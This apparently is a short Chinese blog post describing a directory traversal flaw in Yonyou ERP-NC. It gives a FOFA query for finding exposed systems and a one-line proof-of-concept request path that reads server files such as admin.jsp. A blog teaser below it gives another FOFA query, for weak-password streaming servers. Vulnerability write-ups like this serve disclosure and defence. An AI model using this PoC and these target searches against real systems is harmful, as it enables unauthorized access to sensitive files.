⽤友ERP-NC ⽬录遍历漏洞


漏洞描述

⽤友ERP-NC 存在⽬录遍历漏洞,攻击者可以通过⽬录遍历获取敏感⽂件信息

fofa语法

app="⽤友-UFIDA-NC"

复现

POC:

 /NCFindWeb?service=IPreAlertConfigService&filename=

查看文件(这里以admin.jsp为例):


文章作者: 剑胆琴心
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 剑胆琴心 !
评论
 上一篇
流媒体管理服务器存在弱⼝令漏洞 流媒体管理服务器存在弱⼝令漏洞
fofa语句: title="流媒体管理服务器" 登录: document.querySelectorAll('.github-emoji') .forEach(el => {
2021-04-29
下一篇 
致学弟学妹 致学弟学妹
各位学弟学妹好,我是2016级地信的薛彭帅。本来是打算录个小视频的,但由于工作原因没有实现,索性就用简单的文字来表达吧。 听说老师们组织你们年轻一届的学生参加行业内的各种比赛,听到之后非常羡慕,都有点想回去再上一次学了😆。由于我们当时参加
2021-04-29 剑胆琴心
  目录